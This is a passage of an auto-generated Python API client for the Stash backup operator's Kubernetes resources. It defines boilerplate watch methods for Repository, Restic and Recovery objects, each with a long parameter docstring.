:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_repository" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_repository`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/repositories/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def watch_stash_appscode_com_v1alpha1_namespaced_repository_list(self, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_repository_list # noqa: E501
watch individual changes to a list of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_repository_list(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_repository_list_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_namespaced_repository_list_with_http_info(namespace, **kwargs) # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_namespaced_repository_list_with_http_info(self, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_repository_list # noqa: E501
watch individual changes to a list of Repository # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_repository_list_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_repository_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_repository_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/repositories', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def watch_stash_appscode_com_v1alpha1_namespaced_restic(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
watch changes to an object of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_restic(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, **kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, **kwargs) # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(self, name, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_restic # noqa: E501
watch changes to an object of kind Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_restic_with_http_info(name, namespace, async=True)
>>> result = thread.get()
:param async bool
:param str name: name of the Restic (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_restic" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params or
params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_restic`") # noqa: E501
collection_formats = {}
path_params = {}
if 'name' in params:
path_params['name'] = params['name'] # noqa: E501
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/restics/{name}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def watch_stash_appscode_com_v1alpha1_namespaced_restic_list(self, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_restic_list # noqa: E501
watch individual changes to a list of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_restic_list(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
return self.watch_stash_appscode_com_v1alpha1_namespaced_restic_list_with_http_info(namespace, **kwargs) # noqa: E501
else:
(data) = self.watch_stash_appscode_com_v1alpha1_namespaced_restic_list_with_http_info(namespace, **kwargs) # noqa: E501
return data
def watch_stash_appscode_com_v1alpha1_namespaced_restic_list_with_http_info(self, namespace, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_namespaced_restic_list # noqa: E501
watch individual changes to a list of Restic # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_namespaced_restic_list_with_http_info(namespace, async=True)
>>> result = thread.get()
:param async bool
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', '_continue', 'field_selector', 'include_uninitialized', 'label_selector', 'limit', 'pretty', 'resource_version', 'timeout_seconds', 'watch'] # noqa: E501
all_params.append('async')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_stash_appscode_com_v1alpha1_namespaced_restic_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params or
params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_stash_appscode_com_v1alpha1_namespaced_restic_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace'] # noqa: E501
query_params = []
if '_continue' in params:
query_params.append(('continue', params['_continue'])) # noqa: E501
if 'field_selector' in params:
query_params.append(('fieldSelector', params['field_selector'])) # noqa: E501
if 'include_uninitialized' in params:
query_params.append(('includeUninitialized', params['include_uninitialized'])) # noqa: E501
if 'label_selector' in params:
query_params.append(('labelSelector', params['label_selector'])) # noqa: E501
if 'limit' in params:
query_params.append(('limit', params['limit'])) # noqa: E501
if 'pretty' in params:
query_params.append(('pretty', params['pretty'])) # noqa: E501
if 'resource_version' in params:
query_params.append(('resourceVersion', params['resource_version'])) # noqa: E501
if 'timeout_seconds' in params:
query_params.append(('timeoutSeconds', params['timeout_seconds'])) # noqa: E501
if 'watch' in params:
query_params.append(('watch', params['watch'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/apis/stash.appscode.com/v1alpha1/watch/namespaces/{namespace}/restics', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='IoK8sApimachineryPkgApisMetaV1WatchEvent', # noqa: E501
auth_settings=auth_settings,
async=params.get('async'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces(self, **kwargs): # noqa: E501
"""watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces # noqa: E501
watch individual changes to a list of Recovery # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async=True
>>> thread = api.watch_stash_appscode_com_v1alpha1_recovery_list_for_all_namespaces(async=True)
>>> result = thread.get()
:param async bool
:param str _continue: The continue option should be set when retrieving more results from the server. Since this value is server defined, clients may only use the continue value from a previous query result with identical query parameters (except for the value of continue) and the server may reject a continue value it does not recognize. If the specified continue value is no longer valid whether due to expiration (generally five to fifteen minutes) or a configuration change on the server the server will respond with a 410 ResourceExpired error indicating the client must restart their list without the continue field. This field is not supported when watch is true. Clients may start a watch from the last resourceVersion value returned by the server and not miss any modifications.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param bool include_uninitialized: If true, partially initialized resources are included in the response.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param int limit: limit is a maximum number of responses to return for a list call. If more items exist, the server will set the `continue` field on the list metadata to a value that can be used with the same initial query to retrieve the next set of results. Setting a limit may return fewer than the requested amount of items (up to zero items) in the event all requested objects are filtered out and clients should only use the presence of the continue field to determine whether more results are available. Servers may choose not to support the limit argument and will return all of the available results. If limit is specified and the continue field is empty, clients may assume that no more results are available. This field is not supported if watch is true. The server guarantees that the objects returned when using continue will be identical to issuing a single list call without a limit - that is, no objects created, modified, or deleted after the first request is issued will be included in any subsequent continued requests. This is sometimes referred to as a consistent snapshot, and ensures that a client that is using limit to receive smaller chunks of a very large result can ensure they see all possible objects. If objects are updated during a chunked list the version of the object that was present at the time the first list result was calculated is returned.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history. When specified for list: - if unset, then the result is returned from remote storage based on quorum-read flag; - if it's 0, then we simply return what we currently have in cache, no guarantee; - if set to non zero, then the result is at least as fresh as given rv.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: IoK8sApimachineryPkgApisMetaV1WatchEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async'):
